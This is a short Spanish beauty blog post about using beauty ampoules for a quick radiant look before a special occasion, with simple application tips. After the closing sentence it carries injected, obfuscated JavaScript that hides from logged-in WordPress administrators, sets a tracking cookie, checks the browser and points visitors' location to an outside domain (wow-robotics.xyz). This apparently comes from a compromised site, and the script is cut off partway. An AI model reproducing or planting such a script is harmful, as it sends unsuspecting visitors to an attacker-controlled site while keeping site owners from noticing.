¿Tienes un día especial y quieres estar resplandeciente?

Te invito a que pruebes un flash de belleza o ampollas de belleza. En el mercado, puedes encontrar diferentes formatos, como por ejemplo ampollas para ocasiones puntuales. Éstas, actúan alisando los rasgos rápidamente, difuminando las pequeñas arrugas y dando un efecto más luminoso al maquillaje.

El modo de aplicarlas, una vez esté la piel del rostro bien hidratada, es extender el contenido de la ampolla (excepto un poquito de producto que dejamos en la ampolla para después) con pequeños toques por el rostro, cuello y escote, dejando que actúe durante unos minutos. Posteriormente, mezclamos lo que nos ha sobrado anteriormente con el maquillaje, y así obtendremos un maquillaje perfecto durante todo el día.

También existen flash de belleza en cremas, mascarillas de efecto inmediato… eso sí, con un efecto menos tensor que las ampollas.

¡Di adiós a un rostro de aspecto apagado y cansado! 😉 var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone